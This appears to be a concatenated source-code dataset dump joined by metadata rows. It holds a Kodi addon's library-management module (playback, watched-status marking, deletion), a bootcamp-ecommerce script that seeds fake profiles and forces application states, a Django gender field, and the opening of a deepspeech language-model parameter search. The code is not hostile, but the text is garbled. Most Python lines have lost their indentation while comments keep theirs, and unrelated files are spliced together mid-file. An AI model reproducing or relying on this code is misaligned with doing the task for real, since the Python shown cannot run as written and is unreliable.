item_json = Item().fromjson(filetools.read(json_path))
        # Support relative paths in downloads
if filetools.is_relative(item_json.url):
item_json.url = filetools.join(library.LIBRARY_PATH,item_json.url)
del list_canales['descargas']
        # Check that the video has not been deleted
if filetools.exists(item_json.url):
item_local = item_json.clone(action='play')
itemlist.append(item_local)
else:
num_canales -= 1
filtro_canal = ''
if num_canales > 1 and config.get_setting("ask_channel", "biblioteca") == True:
opciones = ["Mostrar solo los enlaces de %s" % k.capitalize() for k in list_canales.keys()]
opciones.insert(0, "Mostrar todos los enlaces")
if item_local:
opciones.append(item_local.title)
from platformcode import platformtools
index = platformtools.dialog_select(config.get_localized_string(30163), opciones)
if index < 0:
return []
elif item_local and index == len(opciones) - 1:
filtro_canal = 'descargas'
platformtools.play_video(item_local)
elif index > 0:
filtro_canal = opciones[index].replace("Mostrar solo los enlaces de ", "")
itemlist = []
for nom_canal, json_path in list_canales.items():
if filtro_canal and filtro_canal != nom_canal.capitalize():
continue
        # Import the channel for the selected entry
try:
channel = __import__('channels.%s' % nom_canal, fromlist=["channels.%s" % nom_canal])
except ImportError:
exec "import channels." + nom_canal + " as channel"
item_json = Item().fromjson(filetools.read(json_path))
list_servers = []
try:
# FILTERTOOLS
            # If the channel has a filter, pass it the stored name so it filters correctly.
if "list_idiomas" in item_json:
                # when coming from the Mzero library
if "library_filter_show" in item:
item_json.show = item.library_filter_show.get(nom_canal, "")
            # Run findvideos, either the channel's own or the generic one
if hasattr(channel, 'findvideos'):
list_servers = getattr(channel, 'findvideos')(item_json)
else:
from core import servertools
list_servers = servertools.find_video_items(item_json)
except Exception as ex:
logger.error("Ha fallado la funcion findvideos para el canal %s" % nom_canal)
template = "An exception of type {0} occured. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
logger.error(message)
        # Prefix each server title with the channel name, and copy the item's
        # infoLabels and images onto servers that lack them
for server in list_servers:
            if not server.action: # Skip label entries
continue
server.contentChannel = server.channel
server.channel = "biblioteca"
server.nfo = item.nfo
server.strm_path = item.strm_path
server.title = "%s: %s" % (nom_canal.capitalize(), server.title)
server.infoLabels = item_json.infoLabels
if not server.thumbnail:
server.thumbnail = item.thumbnail
#logger.debug("server:\n%s" % server.tostring('\n'))
itemlist.append(server)
# return sorted(itemlist, key=lambda it: it.title.lower())
return itemlist
def play(item):
logger.info()
#logger.debug("item:\n" + item.tostring('\n'))
if not item.contentChannel == "local":
channel = __import__('channels.%s' % item.contentChannel, fromlist=["channels.%s" % item.contentChannel])
if hasattr(channel, "play"):
itemlist = getattr(channel, "play")(item)
else:
itemlist = [item.clone()]
else:
itemlist = [item.clone(url=item.strm_path, server="local")]
    # Needed in case the channel's play() drops these fields
for v in itemlist:
v.nfo = item.nfo
v.strm_path = item.strm_path
v.infoLabels = item.infoLabels
if item.contentTitle:
v.title = item.contentTitle
else:
if item.contentType == "episode":
v.title = "Episodio %s" % item.contentEpisodeNumber
v.thumbnail = item.thumbnail
v.contentThumbnail = item.thumbnail
return itemlist
def update_biblio(item):
logger.info()
    # Update active series, overwriting existing episodes
import library_service
library_service.check_for_update(overwrite=True)
    # Remove movie folders that no longer contain a strm file
for raiz, subcarpetas, ficheros in filetools.walk(library.MOVIES_PATH):
strm = False
for f in ficheros:
if f.endswith(".strm"):
strm = True
break
if ficheros and not strm:
logger.debug("Borrando carpeta de pelicula eliminada: %s" % raiz)
filetools.rmdirtree(raiz)
# context menu methods
def update_serie(item):
logger.info()
#logger.debug("item:\n" + item.tostring('\n'))
heading = 'Actualizando serie....'
p_dialog = platformtools.dialog_progress_bg('Mzero', heading)
p_dialog.update(0, heading, item.contentSerieName)
import library_service
if library_service.update(item.path, p_dialog, 1, 1, item, False) and config.is_xbmc():
from platformcode import xbmc_library
xbmc_library.update(folder=filetools.basename(item.path))
p_dialog.close()
def mark_content_as_watched(item):
logger.info()
# logger.debug("item:\n" + item.tostring('\n'))
if filetools.exists(item.nfo):
head_nfo = filetools.read(item.nfo, 0, 1)
it = Item().fromjson(filetools.read(item.nfo, 1))
if item.contentType == 'movie':
name_file = os.path.splitext(os.path.basename(item.nfo))[0]
elif item.contentType == 'episode':
name_file = "%sx%s" % (item.contentSeason, str(item.contentEpisodeNumber).zfill(2))
else:
name_file = item.contentTitle
if not hasattr(it, 'library_playcounts'):
it.library_playcounts = {}
it.library_playcounts.update({name_file: item.playcount})
        # if every episode of a season is marked, mark the season as well
if item.contentType != 'movie':
it = check_season_playcount(it, item.contentSeason)
        # Save the changes to item.nfo
if filetools.write(item.nfo, head_nfo + it.tojson()):
item.infoLabels['playcount'] = item.playcount
if item.contentType == 'tvshow':
                # Update the whole series
new_item = item.clone(contentSeason=-1)
mark_season_as_watched(new_item)
if config.is_xbmc():
from platformcode import xbmc_library
xbmc_library.mark_content_as_watched_on_kodi(item, item.playcount)
platformtools.itemlist_refresh()
def mark_season_as_watched(item):
logger.info()
# logger.debug("item:\n" + item.tostring('\n'))
    # Get the dict of marked episodes
f = filetools.join(item.path, 'tvshow.nfo')
head_nfo, it = library.read_nfo(f)
if not hasattr(it, 'library_playcounts'):
it.library_playcounts = {}
    # Collect the episode files
raiz, carpetas_series, ficheros = filetools.walk(item.path).next()
    # Mark every episode found for this season
episodios_marcados = 0
for i in ficheros:
if i.endswith(".strm"):
season_episode = scrapertools.get_season_and_episode(i)
if not season_episode:
                # The file name does not include season and episode numbers
continue
season, episode = season_episode.split("x")
if int(item.contentSeason) == -1 or int(season) == int(item.contentSeason):
name_file = os.path.splitext(os.path.basename(i))[0]
it.library_playcounts[name_file] = item.playcount
episodios_marcados += 1
if episodios_marcados:
if int(item.contentSeason) == -1:
            # Add every season to the item.library_playcounts dict
for k in it.library_playcounts.keys():
if k.startswith("season"):
it.library_playcounts[k] = item.playcount
else:
            # Add this season to the item.library_playcounts dict
it.library_playcounts["season %s" % item.contentSeason] = item.playcount
        # if every season is watched, mark the show as watched
it = check_tvshow_playcount(it, item.contentSeason)
        # Save the changes to tvshow.nfo
filetools.write(f, head_nfo + it.tojson())
item.infoLabels['playcount'] = item.playcount
if config.is_xbmc():
        # Update the Kodi database
from platformcode import xbmc_library
xbmc_library.mark_season_as_watched_on_kodi(item, item.playcount)
platformtools.itemlist_refresh()
def mark_tvshow_as_updatable(item):
logger.info()
head_nfo, it = library.read_nfo(item.nfo)
it.active = item.active
filetools.write(item.nfo, head_nfo + it.tojson())
platformtools.itemlist_refresh()
def eliminar(item):
def eliminar_todo(item):
filetools.rmdirtree(item.path)
if config.is_xbmc():
import xbmc
            # wait 3 seconds to give file deletion time to finish
xbmc.sleep(3000)
            # TODO: find out why cleaning the Kodi library fails when a path is added
            # clean the Kodi library
from platformcode import xbmc_library
xbmc_library.clean()
logger.info("Eliminados todos los enlaces")
platformtools.itemlist_refresh()
logger.info(item.contentTitle)
#logger.debug(item.tostring('\n'))
if item.contentType == 'movie':
heading = "Eliminar película"
else:
heading = "Eliminar serie"
if item.multicanal:
        # Get the list of channels
opciones = ["Eliminar solo los enlaces de %s" % k.capitalize() for k in item.library_urls.keys() if k !="descargas"]
opciones.insert(0, heading)
index = platformtools.dialog_select(config.get_localized_string(30163), opciones)
if index == 0:
# Seleccionado Eliminar pelicula/serie
eliminar_todo(item)
elif index > 0:
# Seleccionado Eliminar canal X
canal = opciones[index].replace("Eliminar solo los enlaces de ", "").lower()
num_enlaces= 0
for fd in filetools.listdir(item.path):
if fd.endswith(canal + '].json'):
if filetools.remove(filetools.join(item.path, fd)):
num_enlaces += 1
if num_enlaces > 0:
                # Update the .nfo
head_nfo, item_nfo = library.read_nfo(item.nfo)
del item_nfo.library_urls[canal]
filetools.write(item.nfo, head_nfo + item_nfo.tojson())
msg_txt = "Eliminados %s enlaces del canal %s" % (num_enlaces, canal)
logger.info(msg_txt)
platformtools.dialog_notification(heading, msg_txt)
platformtools.itemlist_refresh()
else:
if platformtools.dialog_yesno(heading,
"¿Realmente desea eliminar '%s' de su biblioteca?" % item.infoLabels['title']):
eliminar_todo(item)
def check_season_playcount(item, season):
logger.info()
# logger.debug("item " + item.tostring("\n"))
episodios_temporada = 0
episodios_vistos_temporada = 0
for key, value in item.library_playcounts.iteritems():
if key.startswith("%sx" % season):
episodios_temporada += 1
if value > 0:
episodios_vistos_temporada += 1
if episodios_temporada == episodios_vistos_temporada:
        # every episode of the season is watched: mark the season as watched
item.library_playcounts.update({"season %s" % season: 1})
else:
        # at least one episode is unwatched: mark the season as unwatched
item.library_playcounts.update({"season %s" % season: 0})
return check_tvshow_playcount(item, season)
def check_tvshow_playcount(item, season):
logger.info()
# logger.debug("item " + item.tostring("\n"))
temporadas_serie = 0
temporadas_vistas_serie = 0
for key, value in item.library_playcounts.iteritems():
if key == ("season %s" % season):
temporadas_serie += 1
if value > 0:
temporadas_vistas_serie += 1
if temporadas_serie == temporadas_vistas_serie:
item.library_playcounts.update({item.title: 1})
else:
item.library_playcounts.update({item.title: 0})
return item
| gpl-3.0 | -6,729,001,074,678,392,000 | 38.120991 | 124 | 0.566978 | false |
mitodl/bootcamp-ecommerce | localdev/seed/app_state_api.py | 1 | 17130 | """API functionality for setting the state of an application"""
import os
import random
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.core.files import File
from django.db.models import Max
from applications.models import (
VideoInterviewSubmission,
QuizSubmission,
ApplicationStepSubmission,
)
from applications.constants import (
AppStates,
REVIEW_STATUS_REJECTED,
REVIEW_STATUS_PENDING,
REVIEW_STATUS_APPROVED,
ORDERED_UNFINISHED_APP_STATES,
SUBMISSION_REVIEW_COMPLETED_STATES,
SUBMISSION_VIDEO,
SUBMISSION_QUIZ,
SUBMISSION_STATUS_SUBMITTED,
)
from jobma.models import Job, Interview
from jobma.constants import COMPLETED
from ecommerce.models import Order, Line
from ecommerce.api import complete_successful_order
from profiles.models import Profile, LegalAddress
from profiles.api import is_user_info_complete
from main.utils import now_in_utc, get_filename_from_path, partition_around_index
User = get_user_model()
ALLOWED_STATES = ORDERED_UNFINISHED_APP_STATES + [AppStates.COMPLETE.value]
DUMMY_RESUME_FILEPATH = "localdev/seed/resources/dummy_resume.pdf"
DUMMY_RESUME_FILENAME = get_filename_from_path(DUMMY_RESUME_FILEPATH)
DUMMY_RESUME_ENCODING = "iso-8859-1"
DUMMY_LINKEDIN_URL = "http://example.com/linkedin"
DUMMY_INTERVIEW_URL = ("http://example.com/video",)
DUMMY_INTERVIEW_RESULTS_URL = "http://example.com/video-result"
INTERVIEW_TEMPLATE_ID = 123
PROFILE_CHOICES = {
"company": ("MIT", "Boeing"),
"gender": ("m", "f", "o"),
"birth_year": (1950, 1960, 1970, 1980, 1990),
"job_title": ("Software Developer", "Administrator", "Professor", "Emperor"),
"industry": ("Tech", "Higher Ed"),
"job_function": ("Working hard", "Hardly working"),
"company_size": (9, 99),
"years_experience": (2, 5, 10),
"highest_education": ("Doctorate", "Bachelor's degree"),
"name": (
"Joseph M. Acaba",
"Kayla Barron",
"Raja Chari",
"Jeanatte J. Epps",
"Bob Hines",
"Jonny Kim",
"Nicole Aunapu Mann",
"Kathleen Rubins",
"Mark T. Vande Hei",
),
}
LEGAL_ADDRESS_CHOICES = {
"street_address_1": ("1 Main St", "500 Technology Square", "4 Washington Lane"),
"city": ("Cambridge", "Boston", "Somerville", "Townsville"),
"country": ("US",),
"state_or_territory": ("US-MA", "US-CT", "US-VT", "US-NH"),
"postal_code": ("02139", "02201", "02139"),
}
def fill_out_registration_info(user):
"""Ensures that the user has a fully filled out profile and legal address"""
profile, profile_created = Profile.objects.get_or_create(user=user)
if profile_created or not profile.is_complete:
profile.name = random.choice(PROFILE_CHOICES["name"])
profile_field_values = [
(field_name, values)
for field_name, values in PROFILE_CHOICES.items()
if field_name != "name"
]
for field_name, values in profile_field_values:
setattr(profile, field_name, random.choice(values))
profile.save()
if not profile.name:
profile.name = random.choice(PROFILE_CHOICES["name"])
profile.save()
if not hasattr(user, "legal_address"):
legal_address_props = {
prop_name: random.choice(prop_values)
for prop_name, prop_values in LEGAL_ADDRESS_CHOICES.items()
}
legal_address = LegalAddress.objects.create(
user=user,
first_name=profile.name.split(" ")[0],
last_name=" ".join(profile.name.split(" ")[1:]),
**legal_address_props,
)
else:
legal_address = user.legal_address
return user, profile, legal_address
def fulfill_video_interview(application, run_application_step):
"""
Ensures that a user has a completed video interview submission for the given application and step
Args:
application (applications.models.BootcampApplication):
run_application_step (applications.models.BootcampRunApplicationStep):
Returns:
ApplicationStepSubmission: The created or updated submission
"""
# If Job records already exist, use the max job_id value and add 1 for the new job_id. Otherwise use 1.
job_id = (
1
if Job.objects.count() == 0
else (Job.objects.aggregate(max_job_id=Max("job_id"))["max_job_id"] + 1)
)
job, _ = Job.objects.get_or_create(
run=application.bootcamp_run,
defaults=dict(
job_title=application.bootcamp_run.title,
job_id=job_id,
job_code=f"job_run_{application.bootcamp_run.id}",
interview_template_id=INTERVIEW_TEMPLATE_ID,
),
)
interview, _ = Interview.objects.get_or_create(
job=job,
applicant=application.user,
defaults=dict(
status=COMPLETED,
interview_url=DUMMY_INTERVIEW_URL,
results_url=DUMMY_INTERVIEW_RESULTS_URL,
interview_token="".join([str(random.randint(0, 9)) for _ in range(0, 9)]),
),
)
submission, _ = VideoInterviewSubmission.objects.get_or_create(interview=interview)
step_submission, _ = ApplicationStepSubmission.objects.update_or_create(
bootcamp_application=application,
run_application_step=run_application_step,
defaults=dict(
submitted_date=now_in_utc(),
review_status=REVIEW_STATUS_PENDING,
review_status_date=None,
submission_status=SUBMISSION_STATUS_SUBMITTED,
content_type=ContentType.objects.get(
app_label="applications", model=SUBMISSION_VIDEO
),
object_id=submission.id,
),
)
return step_submission
def fulfill_quiz_interview(application, run_application_step):
"""
Ensures that a user has a completed quiz interview submission for the given application and step
Args:
application (applications.models.BootcampApplication):
run_application_step (applications.models.BootcampRunApplicationStep):
Returns:
ApplicationStepSubmission: The created or updated submission
"""
submission = QuizSubmission.objects.create(started_date=None)
step_submission, _ = ApplicationStepSubmission.objects.update_or_create(
bootcamp_application=application,
run_application_step=run_application_step,
defaults=dict(
submitted_date=now_in_utc(),
review_status=REVIEW_STATUS_PENDING,
review_status_date=None,
submission_status=SUBMISSION_STATUS_SUBMITTED,
content_type=ContentType.objects.get(
app_label="applications", model=SUBMISSION_QUIZ
),
object_id=submission.id,
),
)
return step_submission
SUBMISSION_FACTORIES = {
SUBMISSION_VIDEO: fulfill_video_interview,
SUBMISSION_QUIZ: fulfill_quiz_interview,
}
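# Dispatch table mapping an application step's submission_type to the factory
# that fabricates a completed submission for it (see AwaitingSubmissionsStep).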
class AppStep:
"""Base class for evaluating/setting an application at a certain state"""
state = None
@staticmethod
def is_fulfilled(application):
"""Returns True if the given application step has been fulfilled"""
raise NotImplementedError
@staticmethod
def _fulfill(application, **kwargs):
"""Performs the necessary data manipulation to fulfill this step of the application"""
raise NotImplementedError
@staticmethod
def _revert(application):
"""
Performs the necessary data manipulation to ensure that this step of the application has not been fulfilled
"""
raise NotImplementedError
@classmethod
def fulfill(cls, application, **kwargs):
"""
Performs the necessary data manipulation to fulfill this step of the application, and ensures that the
application is in the correct state afterwards
"""
cls._fulfill(application, **kwargs)
# NOTE: These functions perform some data manipulation on an application that aren't supported by normal
# functionality, hence the manual setting of the state instead of using state transitions.
application.refresh_from_db()
state_idx = ORDERED_UNFINISHED_APP_STATES.index(cls.state)
new_state = (
AppStates.COMPLETE.value
if state_idx == len(ORDERED_UNFINISHED_APP_STATES) - 1
else ORDERED_UNFINISHED_APP_STATES[state_idx + 1]
)
application.state = new_state
application.save()
@classmethod
def revert(cls, application):
"""
Performs the necessary data manipulation to ensure that this step of the application has not been fulfilled,
and ensures that the application is in the correct state afterwards
"""
cls._revert(application)
# NOTE: These functions perform some data manipulation on an application that aren't supported by normal
# functionality, hence the manual setting of the state instead of using state transitions.
application.refresh_from_db()
application.state = cls.state
application.save()
class AwaitingProfileStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting profile' step of an application"""
state = AppStates.AWAITING_PROFILE_COMPLETION.value
@staticmethod
def is_fulfilled(application):
return is_user_info_complete(application.user)
@staticmethod
def _fulfill(application, **kwargs):
fill_out_registration_info(application.user)
@staticmethod
def _revert(application):
LegalAddress.objects.filter(user=application.user).delete()
class AwaitingResumeStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting resume' step of an application"""
state = AppStates.AWAITING_RESUME.value
@staticmethod
def is_fulfilled(application):
return application.resume_upload_date is not None and (
application.resume_file is not None or application.linkedin_url is not None
)
@staticmethod
def _fulfill(application, **kwargs):
with open(
os.path.join(settings.BASE_DIR, DUMMY_RESUME_FILEPATH), "rb"
) as resume_file:
application.add_resume(
resume_file=File(resume_file, name=DUMMY_RESUME_FILENAME),
linkedin_url=DUMMY_LINKEDIN_URL,
)
application.save()
@staticmethod
def _revert(application):
if application.resume_file is not None:
application.resume_file.delete()
application.resume_file = None
application.linkedin_url = None
application.resume_upload_date = None
application.save()
class AwaitingSubmissionsStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting submissions' step of an application"""
state = AppStates.AWAITING_USER_SUBMISSIONS.value
@staticmethod
def is_fulfilled(application):
submissions = list(application.submissions.all())
submission_review_statuses = [
submission.review_status for submission in submissions
]
if any(
[status == REVIEW_STATUS_REJECTED for status in submission_review_statuses]
):
return True
elif any(
[status == REVIEW_STATUS_PENDING for status in submission_review_statuses]
):
return True
        elif len(submissions) < application.bootcamp_run.application_steps.count():
            return False
        # every required submission exists and none is pending or rejected
        return True
@staticmethod
def _fulfill(application, **kwargs):
num_to_fulfill = kwargs.get("num_submissions", None)
run_steps = application.bootcamp_run.application_steps.order_by(
"application_step__step_order"
).all()
num_to_fulfill = num_to_fulfill or len(run_steps)
if num_to_fulfill and num_to_fulfill > len(run_steps):
raise ValidationError(
"{} step(s) exist. Cannot fulfill {}.".format(
len(run_steps), num_to_fulfill
)
)
for i, run_step in enumerate(run_steps):
if i >= num_to_fulfill:
break
submission_factory = SUBMISSION_FACTORIES[
run_step.application_step.submission_type
]
submission_factory(application, run_step)
@staticmethod
def _revert(application):
application.submissions.all().delete()
class AwaitingReviewStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting submission review' step of an application"""
state = AppStates.AWAITING_SUBMISSION_REVIEW.value
@staticmethod
def is_fulfilled(application):
submissions = list(application.submissions.all())
submission_review_statuses = [
submission.review_status for submission in submissions
]
return len(submissions) > 0 and len(submissions) == len(
[
status
for status in submission_review_statuses
if status in SUBMISSION_REVIEW_COMPLETED_STATES
]
)
@staticmethod
def _fulfill(application, **kwargs):
num_to_fulfill = kwargs.get("num_reviews", None)
submissions = list(
application.submissions.order_by(
"run_application_step__application_step__step_order"
).all()
)
num_to_fulfill = num_to_fulfill or len(submissions)
if num_to_fulfill and num_to_fulfill > len(submissions):
raise ValidationError(
"{} submission(s) exist. Cannot fulfill {}.".format(
len(submissions), num_to_fulfill
)
)
now = now_in_utc()
for i, submission in enumerate(submissions):
if i >= num_to_fulfill:
break
submission.review_status = REVIEW_STATUS_APPROVED
submission.review_status_date = now
submission.save()
@staticmethod
def _revert(application):
application.submissions.update(
review_status=REVIEW_STATUS_PENDING, review_status_date=None
)
class AwaitingPaymentStep(AppStep):
"""Provides functionality for fulfilling or reverting the 'awaiting payment' step of an application"""
state = AppStates.AWAITING_PAYMENT.value
@staticmethod
def is_fulfilled(application):
return application.is_paid_in_full
@staticmethod
def _fulfill(application, **kwargs):
run = application.bootcamp_run
total_run_price = run.price
order, _ = Order.objects.update_or_create(
user=application.user,
application=application,
defaults=dict(status=Order.FULFILLED, total_price_paid=total_run_price),
)
Line.objects.update_or_create(
order=order, bootcamp_run=run, defaults=dict(price=total_run_price)
)
complete_successful_order(order, send_receipt=False)
@staticmethod
def _revert(application):
Order.objects.filter(application=application).delete()
ORDERED_APPLICATION_STEP_CLASSES = [
AwaitingProfileStep,
AwaitingResumeStep,
AwaitingSubmissionsStep,
AwaitingReviewStep,
AwaitingPaymentStep,
]
def set_application_state(application, target_state):
"""
Manipulates the given application into the target state.
Args:
application (BootcampApplication):
target_state (str): The desired state of the application
Returns:
BootcampApplication: The updated application
"""
if settings.ENVIRONMENT in {"prod", "production"}:
raise ValidationError("This API function cannot be used in production")
assert target_state in ALLOWED_STATES
if target_state == AppStates.COMPLETE.value:
previous_step_classes, next_step_classes = (
ORDERED_APPLICATION_STEP_CLASSES,
[],
)
target_step_cls = None
else:
target_state_cls_index = next(
i
for i, step_cls in enumerate(ORDERED_APPLICATION_STEP_CLASSES)
if step_cls.state == target_state
)
previous_step_classes, next_step_classes = partition_around_index(
ORDERED_APPLICATION_STEP_CLASSES, target_state_cls_index
)
target_step_cls = ORDERED_APPLICATION_STEP_CLASSES[target_state_cls_index]
# Revert all steps that come after the target
for step_cls in reversed(next_step_classes):
step_cls.revert(application)
# Apply/fulfill all steps before the target (if not already fulfilled)
for step_cls in previous_step_classes:
if not step_cls.is_fulfilled(application):
step_cls.fulfill(application)
if target_step_cls:
# Make sure that the target state hasn't already been fulfilled
target_step_cls.revert(application)
return application
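# Hedged usage sketch (BootcampApplicationFactory is a hypothetical test
# fixture, not defined here): drive a fresh application straight to the
# payment step, fulfilling every earlier step along the way.
#
# application = BootcampApplicationFactory.create()
# set_application_state(application, AppStates.AWAITING_PAYMENT.value)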
| bsd-3-clause | 5,803,917,556,540,261,000 | 34.83682 | 116 | 0.648803 | false |
TamiaLab/carnetdumaker | apps/gender/fields.py | 1 | 1538 | """
Model fields for the gender app.
"""
from django.db import models
from django.utils import six
from django.utils.translation import ugettext_lazy as _
from .constants import (GENDER_CHOICES,
GENDER_UNKNOWN)
class GenderFieldBase(models.CharField):
"""
This database model field can be used to store the gender of a person.
"""
description = _('A gender type object')
MAX_LENGTH = 1
def __init__(self, *args, **kwargs):
parent_kwargs = {
'max_length': self.MAX_LENGTH,
'choices': GENDER_CHOICES,
'default': GENDER_UNKNOWN,
'blank': True,
}
parent_kwargs.update(kwargs)
super(GenderFieldBase, self).__init__(*args, **parent_kwargs)
def deconstruct(self):
name, path, args, kwargs = super(GenderFieldBase, self).deconstruct()
if kwargs['choices'] == GENDER_CHOICES:
del kwargs['choices']
if kwargs['max_length'] == self.MAX_LENGTH:
del kwargs['max_length']
if kwargs['default'] == GENDER_UNKNOWN:
del kwargs['default']
if kwargs['blank']:
del kwargs['blank']
return name, path, args, kwargs
def get_internal_type(self):
return "CharField"
class GenderField(six.with_metaclass(models.SubfieldBase,
GenderFieldBase)):
"""
Database gender field. Can be used to store a gender type.
See ``GenderFieldBase`` for details.
"""
pass
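# Hedged usage sketch (Profile is a hypothetical model, not part of this
# app): the field stores a one-character gender code, and deconstruct()
# drops the defaulted kwargs so generated migrations stay minimal.
#
# from apps.gender.fields import GenderField
#
# class Profile(models.Model):
#     gender = GenderField()  # defaults to GENDER_UNKNOWN, blank allowed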
| agpl-3.0 | 8,364,084,219,892,851,000 | 27.481481 | 77 | 0.587776 | false |
JaredButcher/dayOfSagittariusIII | Server/sockServer.py | 1 | 8357 | import asyncio
import dataManagement
from enum import Enum, unique
import html
import json
import threading
import websockets
dataStor = None
def start(port, data):
global dataStor
dataStor = data
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
coro = websockets.server.serve(handle_conn, host='', port=port, loop=loop)
server = loop.run_until_complete(coro)
except OSError:
print("close")
else:
loop.run_forever()
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
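# Hedged sketch of how start() is presumably driven (the threading import
# above suggests the server runs on its own thread; DataStor is an
# assumption about dataManagement's API, not confirmed by this file):
#
# data = dataManagement.DataStor()
# threading.Thread(target=start, args=(8765, data), daemon=True).start()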
async def handle_conn(conn, Uri):
print("URI: " + Uri)
user = client(conn)
await user.beginReceiveLoop()
class client:
def __init__(self, conn):
self.conn = conn
self.alive = True
self.errorCount = 0
self.user = None
self.receiveDele = []
self.error = False
async def beginReceiveLoop(self):
while self.alive:
global dataStor
try:
data = await self.conn.recv()
except websockets.exceptions.ConnectionClosed as e:
self.destory()
break
#Start processing and constructing response
print("Message: " + data)
res = {}
message = None
try:
message = json.loads(data)
if field.action.value in message:
#INITIAL CONNECTION--------------------------------------------------------
if self.user is None:
if message[field.action.value] == action.init.value:
if field.session.value in message:
user = dataStor.getUser(message[field.session.value])
if user != None:
user.setSock(self)
self.user = user
self.user.rmGame()
if not self.user.getName() is None:
res[field.action.value] = action.name.value
res[field.name.value] = self.user.getName()
self.send(res)
if self.user is None:
self.sendError(error.badInit.value)
#SET NAME-------------------------------------------------------------------
elif message[field.action.value] == action.name.value:
if dataStor.setUserName(self.user, message[field.name.value]):
res[field.action.value] = action.name.value
res[field.name.value] = self.user.getName()
self.send(res)
else:
self.sendError(error.nameUsed.value)
#SERVER BROWSER-------------------------------------------------------------
elif message[field.action.value] == action.servers.value:
self.user.rmGame()
res[field.action.value] = action.servers.value
res[field.servers.value] = dataStor.getSagInfo()
self.send(res)
#MAKE GAME--------------------------------------------------------------------
elif message[field.action.value] == action.makeGame.value:
self.user.rmGame()
gameB = message[field.game.value]
sagGame = None
try:
sagGame = dataStor.makeSagGame(self.user, gameB[game.name.value][:30], int(gameB[game.maxPlayers.value]),
int(gameB[game.damage.value]), int(gameB[game.shipPoints.value]))
except ValueError:
sagGame = None
if sagGame is None:
self.sendError(error.createFail.value)
else:
sagGame.addUser(self.user)
res[field.action.value] = action.join.value
res[field.game.value] = sagGame.getInfo()
self.send(res)
#JOIN GAME---------------------------------------------------------------------
elif message[field.action.value] == action.join.value:
self.user.rmGame()
sagGame = dataStor.getSagGame(message[field.game.value][game.id.value])
if sagGame is None or not sagGame.addUser(self.user):
self.sendError(error.joinFail.value)
else:
res[field.action.value] = action.join.value
res[field.game.value] = sagGame.getInfo()
self.send(res)
#UPDATE--------------------------------------------------------------------------
elif message[field.action.value] == action.update.value and self.user.game:
self.user.game.recUpdate(self.user, message[field.game.value])
except json.JSONDecodeError as e:
print(e.msg)
self.sendError(error.badRequest.value)
if not self.error:
self.errorCount = 0
self.error = False
def sendError(self, errorCode):
res = {}
res[field.action.value] = action.error.value
res[field.error.value] = errorCode
self.send(res)
def send(self, data):
asyncio.get_event_loop().create_task(self._sendHelper(json.dumps(data)))
async def _sendHelper(self, data):
try:
print("Send: " + str(data))
await self.conn.send(data)
except websockets.exceptions.ConnectionClosed as e:
print(e)
self.destory()
def destory(self):
self.alive = False
if self.user:
self.user.rmGame()
self.user.setSock(None)
@unique
class field(Enum):
action = "0"
session = "1"
servers = "2" #[browser]
game = "3" #game
chatContext = "4"
chatMessage = "5"
name = "6"
error = "7"
@unique
class action(Enum):
error = "1"
update = "2"
init = "3"
servers = "4"
join = "5"
name = "6"
makeGame = "7"
chat = "8"
command = "9"
@unique
class error(Enum):
repeat = "0"
stop = "1"
badRequest = "2"
joinFail = "3"
createFail = "4"
badInit = "5"
forbidden = "6"
nameUsed = "7"
@unique
class game(Enum):
id = "0"
players = "1" #[player]
running = "2"
winner = "3"
name = "4"
owner = "5"
maxPlayers = "6"
damage = "7"
shipPoints = "8"
mode = "9"
teams = "10"
map = "11"
@unique
class player(Enum):
id = "0"
name = "1"
team = "2"
gameObj = "3" #[gameObj]
primary = "4" #weapon
primaryAmmo = "5"
secondary = "6" #weapon
secondaryAmmo = "7"
attack = "8"
defense = "9"
scout = "10"
speed = "11"
isFlagship = "12"
ships = "13"
delete = "14"
ready = "15"
@unique
class transform(Enum):
id = "0"
pos = "1" #{x,y}
rot = "2"
targetPos = "3" #{x,y}
targetRot = "4"
posV = "5" #{x,y}
rotV = "6"
hide = "7"
destory = "8"
@unique
class gameObj(Enum):
size = "0"
type = "1"
transform = "2" #transform
@unique
class weapon(Enum):
lazer = "0"
missle = "1"
rail = "2"
mine = "3"
fighter = "4"
plazma = "5"
emc = "6"
jump = "7"
repair = "8"
@unique
class chatContext(Enum):
free = "0"
game = "1"
team = "2"
@unique
class command(Enum):
source = "0" #transform
fire = "1" #ammo used if applicatble
target = "2" #transform
split = "3" #Size of new fleet
merge = "4" #[transform]
weapon = "5"
@unique
class gameMap(Enum):
height = "0"
width = "1"
@unique
class objType(Enum):
fleet = "1"
scout = "2"
scoutMove = "3"
missle = "4"
plasma = "5"
rail = "6" | mit | 310,050,558,187,058,500 | 31.905512 | 133 | 0.459495 | false |
SeanNaren/deepspeech.pytorch | search_lm_params.py | 1 | 3566 | from dataclasses import dataclass
import hydra
from hydra.core.config_store import ConfigStore
import optuna
import torch
from deepspeech_pytorch.configs.train_config import SpectConfig
from deepspeech_pytorch.decoder import BeamCTCDecoder, GreedyDecoder
from deepspeech_pytorch.loader.data_loader import AudioDataLoader, SpectrogramDataset
from deepspeech_pytorch.utils import load_model
from deepspeech_pytorch.validation import run_evaluation
@dataclass
class OptimizerConfig:
model_path: str = ''
test_path: str = '' # Path to test manifest or csv
is_character_based: bool = True # Use CER or WER for finding optimal parameters
lm_path: str = ''
beam_width: int = 10
alpha_from: float = 0.0
alpha_to: float = 3.0
beta_from: float = 0.0
beta_to: float = 1.0
n_trials: int = 500 # Number of trials for optuna
n_jobs: int = 2 # Number of parallel jobs for optuna
precision: int = 16
batch_size: int = 1 # For dataloader
num_workers: int = 1 # For dataloader
spect_cfg: SpectConfig = SpectConfig()
cs = ConfigStore.instance()
cs.store(name="config", node=OptimizerConfig)
class Objective(object):
def __init__(self, cfg):
self.cfg = cfg
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
self.model = load_model(
self.device,
hydra.utils.to_absolute_path(self.cfg.model_path)
)
self.ckpt = torch.load(
hydra.utils.to_absolute_path(self.cfg.model_path),
map_location=self.device
)
self.labels = self.ckpt['hyper_parameters']['labels']
